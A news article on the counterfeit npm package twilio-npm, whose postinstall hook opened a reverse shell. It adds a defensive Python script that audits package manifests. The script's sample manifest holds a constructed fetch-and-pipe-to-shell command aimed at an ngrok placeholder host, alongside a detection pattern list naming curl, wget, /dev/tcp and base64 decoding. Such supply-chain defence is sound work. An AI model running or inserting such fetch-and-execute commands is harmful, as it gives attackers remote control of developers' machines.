Fortunately, the malware detection service Sonatype Release Integrity quickly detected the malware, in three versions, and removed it on Monday.
In a report released Monday, Sonatype said the library was first posted to the npm website on Friday, discovered the same day, and removed on Monday after the npm security team put the package in a blacklist.
There are many legitimate packages in the npm registry related to or representing the official Twilio service.
But according to Ax Sharma, Sonatype's security engineer, twilio-npm has nothing to do with the Twilio company. Twilio is not involved and has nothing to do with this attempted brand theft. Twilio is a leading cloud-based communications platform as a service that allows developers to create VoIP-based applications that can programmatically make and receive phone calls and text messages.
The official Twilio npm package is downloaded almost half a million times a week, according to the engineer. That popularity explains why threat actors might try to catch developers with a counterfeit component carrying a near-identical name.
However, the twilio-npm package did not hold up long enough to fool many people. Uploaded on Friday, October 30, it was flagged as suspicious by Sonatype's Release Integrity service a day later - artificial intelligence and machine learning clearly have uses. On Monday, November 2, the company published its findings and the code was withdrawn.
The counterfeit package is single-file malware with three versions available for download (1.0.0, 1.0.1 and 1.0.2). All three appear to have been released on the same day, October 30. Version 1.0.0 doesn't accomplish much, according to Sharma: it contains only a small manifest file, package.json, which fetches a resource hosted on an ngrok subdomain.
ngrok is a legitimate service that developers use when testing their applications, especially to expose "localhost" server applications sitting behind NAT or a firewall. In versions 1.0.1 and 1.0.2, however, the same manifest's post-install script is modified to perform a malicious task, according to Sharma.
This effectively opens a backdoor on the user's machine, giving the attacker control of the compromised host and remote code execution (RCE) capability. Sharma noted that the reverse shell (reverse command interpreter) only works on UNIX-based operating systems.
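The mechanism described above, a package.json whose install-time lifecycle script pulls something from an ngrok subdomain and runs it, is easy to audit for before a package ever reaches a developer's machine. The following is an added example written for this article, not code from Sonatype, npm or the malicious package: it inspects a manifest's lifecycle hooks for indicators such as an ngrok hostname, a remote-fetch command or a pipe into a shell, and separately flags the structural oddity the article describes, a tarball that contains nothing but package.json yet declares an install hook. The sample manifest, package name and URL are constructed placeholders.

```python
import json
import re

# Constructed sample manifest, modelled on the shape the article describes:
# a postinstall hook pulling a resource from an ngrok subdomain. Name, URL
# and command are placeholders, not the real package's contents.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-counterfeit-pkg",
    "version": "1.0.1",
    "scripts": {
        "postinstall": "curl -s https://example-subdomain.ngrok.io/payload | bash",
        "test": "jest",
    },
})

# Constructed control: a harmless postinstall step that should not be flagged.
BENIGN_MANIFEST = json.dumps({
    "name": "example-benign-pkg",
    "version": "2.3.0",
    "scripts": {
        "postinstall": "node scripts/postinstall.js",
        "test": "jest",
    },
})

# Lifecycle hooks that npm may run automatically during installation, so any
# command in them executes without the developer explicitly invoking it.
LIFECYCLE_HOOKS = (
    "preinstall", "install", "postinstall",
    "preprepare", "prepare", "postprepare",
)

# Each rule is (label, regex). A match is an indicator worth a human look,
# not proof of malice; legitimate native builds also use curl or wget.
INDICATORS = [
    ("ngrok-tunnel", re.compile(r"\bngrok\b", re.I)),
    ("remote-fetch", re.compile(r"\b(curl|wget)\b", re.I)),
    ("pipe-to-shell", re.compile(r"\|\s*(ba)?sh\b", re.I)),
    ("dev-tcp-socket", re.compile(r"/dev/tcp/", re.I)),
    ("base64-decode", re.compile(r"base64\s+(-d|--decode)\b", re.I)),
    ("eval-of-string", re.compile(r"\beval\b", re.I)),
]


def audit_manifest(manifest_text: str) -> dict:
    """Return {hook: [indicator labels]} for each lifecycle hook that trips
    at least one indicator. An empty dict means no hook was flagged."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts") or {}
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        hits = [label for label, pattern in INDICATORS if pattern.search(command)]
        if hits:
            findings[hook] = hits
    return findings


def audit_package(manifest_text: str, file_list) -> dict:
    """Combine the script audit with a structural check. `file_list` is the
    list of paths inside the package tarball (e.g. from `tar -tzf`). A package
    that ships package.json alone but declares an install hook delivers
    nothing except that hook, which is exactly what the article describes."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts") or {}
    has_hook = any(isinstance(scripts.get(h), str) for h in LIFECYCLE_HOOKS)
    only_manifest = all(path.endswith("package.json") for path in file_list)
    return {
        "scripts": audit_manifest(manifest_text),
        "manifest_only_with_hook": has_hook and only_manifest,
    }


if __name__ == "__main__":
    # Single-file package with a suspicious postinstall hook: both checks fire.
    print(audit_package(SAMPLE_MANIFEST, ["package/package.json"]))
    # Benign package with real code alongside its manifest: nothing flagged.
    print(audit_package(BENIGN_MANIFEST, ["package/package.json", "package/index.js"]))
```

Run this over the manifest of a freshly downloaded tarball (npm pack fetches it without running scripts) before the package is installed; as a blanket mitigation, `npm install --ignore-scripts` stops lifecycle hooks from executing at all, at the cost of breaking packages that legitimately need a build step.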
Developers must change IDs, secrets, and keys
The npm advisory says that developers who may have installed the malicious package before it was removed are at risk.
"Any computer on which this package is installed or working should be considered fully compromised," the npm security team said Monday, confirming Sonatype's investigation.